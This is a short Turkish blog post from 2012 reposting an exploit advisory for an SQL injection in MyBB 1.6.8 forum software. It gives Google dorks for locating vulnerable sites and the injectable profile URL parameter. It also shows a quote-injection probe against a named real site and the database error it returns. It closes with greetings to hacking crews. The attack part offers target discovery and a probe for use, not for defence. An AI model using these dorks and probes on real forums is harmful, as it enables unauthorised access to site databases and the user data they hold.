29 Haziran 2012 Cuma

MyBB 1.6.8 SQL Injection Vulnerable (Author : Mr.XpR)

FlipRoot ,
Qocum sende her seye takilma Just ReLaXxX)
Simdi MySQL acigina gelelim. En berbad kurulumlardan 1-ide MyBB-dir. Ve Bu SQL Injection onceden bulunmusdu. Mr.XpR tarafindan. Guzel Vulnerable.
Kod:
-------------------- IN The NAme OF God --------------------


-====MyBB 1.6.8 Sql Injection Vulnerability====-

# Exploit Title: MyBB 1.6.8 Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# Script Site : http://mybb.com
# MAil : No0PM[at]yahoo[dot]com

-====Dork====-

inurl:member.php?action=profile&uid=

inurl:action=profile&uid=27

-====Exploit====-

http://www.Site.com/forums/member.php?action=profile&uid=[Sqli]

-====Example====-

http://www.mihanhack.com/forums/member.php?action=profile&uid=9

http://www.mihanhack.com/forums/member.php?action=profile&uid=9'


-====information====-

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
    SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0' 

-====Tnx To====-

Just Persian Gulf ~~~~ > W3 Are Persian Hackerz

MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

iranhack.***
http://packetstormsecurity.org/files...Injection.html
Gorduyunuz gibi seninkide denk gelmis oldu. Paylasim icin tesekkurler )))))

Hiç yorum yok:

Yorum Gönder